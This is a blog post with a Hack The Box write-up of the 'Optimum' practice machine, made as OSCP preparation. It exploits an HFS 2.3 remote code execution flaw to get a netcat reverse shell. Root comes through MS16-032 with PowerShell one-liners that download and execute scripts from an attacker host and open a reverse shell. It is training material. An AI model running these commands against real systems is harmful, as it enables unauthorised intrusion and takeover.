Road to OSCP - Hack The Box Write Up - Optimum

Blog

10
- Oct
2019
Road to OSCP - Hack The Box Write Up - Optimum

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Optimum

Initial Foothold

There is an HTTP File Server (HFS) version 2.3 on port 80. Doing searchsploit HFS we find one with RCE for version 2.3.x.

User

  1. Mirror the exploit: searchsploit -m 39161.py.
  2. Rename it: mv 39161.py hts.py.
  3. Start the listener: ncat -lnvp 12345.
  4. Modify the exploit to match our local IP address and the port 12345.
  5. Download nc for windows: wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip.
  6. unzip netcat-win32-1.11.zip the the file and cd into it.
  7. (IMPORTANT) Replace nc.exe with the 64 bits binary: rm nc.exe and mv nc64.exe nc.exe.
  8. Start and http server on port 80: python3 -m http.server 80
  9. Run the exploit twice: python3 10.10.10.8 80.
  10. Our ncat listener should have caught a shell.

Root

Upgrade to powershell shell, refer to the CMD cheatsheet. From there, we can download Sherlock.ps1 to quickly test for different CVEs. While Watson is better, it only supports Windows Server 2016 and 2019.

It looks like its vulnerable to MS16-032.

If we use the one from exploit-db, it says it works but it does not spawn a shell. Apparently it tries to spawn a graphical terminal, so it does not work for us.

There is modified version of the script on powershell-empire. Add the following line at the end: Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.31:8000/shell.ps1')"

shell.ps1 also comes from powershell-empire which is: /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1. Append this line to end: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 6969

Set up a python http server: python3 -m http.server. (The default port is port 8000).

Set up a listener: ncat -lnvp 6969.

Finally, on the victim run: IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/Invoke-MS16032.ps1')

Ángel Guzmán/Junior evaluator

Degree and Master in telecommunications by the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.


Contact

Send us your questions or suggestions!

By sending your data you allow us to use it to resolve your doubts by sending you commercial information of interest. We will delete it when they are no longer necessary for this matter. Know your rights in our Privacy Policy.